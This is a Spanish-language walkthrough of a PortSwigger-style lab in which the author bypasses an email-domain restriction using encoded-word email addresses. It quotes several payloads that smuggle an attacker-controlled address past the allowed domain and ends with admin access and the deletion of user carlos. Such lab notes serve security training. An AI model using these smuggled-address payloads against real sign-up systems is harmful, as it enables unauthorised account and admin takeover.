🧊Lab: Bypassing access controls using email address parsing discrepancies

Aqui tengo mi paso a paso de este laboratorio, que a la fecha no he resuelto, por el momento solo tengo todas mis pruebas y apuntes para la resolución.

  • =?utf-8?b?foobar@exploit-0aca001903ace6638045342f01eb00f1.exploit-server.net?=@ginandjuice.shop

  • Zm9vYmFyQGV4cGxvaXQtMGFjYTAwMTkwM2FjZTY2MzgwNDUzNDJmMDFlYjAwZjEuZXhwbG9pdC1zZXJ2ZXIubmV0

Luego el correo de nuestro exploit codeado a base64 lo reemplazamos →

  • =?utf-8?b?Zm9vYmFyQGV4cGxvaXQtMGFjYTAwMTkwM2FjZTY2MzgwNDUzNDJmMDFlYjAwZjEuZXhwbG9pdC1zZXJ2ZXIubmV0?=@ginandjuice.shop

Payloads de prueba que he creado durante el testing ->

Payloads que usé en conjunción con Turbo Intruder ->

En este array actualizado, todas las instancias de "$collab1" han sido reemplazadas por "attacker", como se solicitó.

Intentando con Turbo Intruder con el script de Gareth Heyes →

=?iso-8859-1?q?juanfelipeoz.rar=40gmail.com=3e=1c?=tester@mozilla.com

rhc1n3za9qgcbmrxigrrpzb6nxtohe53.oastify.comarrow-up-right

  • =?utf-8?b?Zm9vYmFy?=@mozilla.com

Ahí vamos, algún día resolveré este condenado Laboratorio!

Payload Final:

Al fin, la solución certera para resolver este lab era con utf-7

  • Donde el exploit server puede ser nuestro collab o el exploit server directo del lab, y ginandjuice.shop es directamente el dominio permitido que queremos bypassear.

Y automaticamente nos llegará el correo al server:

Tendremos acceso directamente como admin, con el dominio permitido que acabamos de bypassear.

Delete carlos

Y resolvimos el lab:

Last updated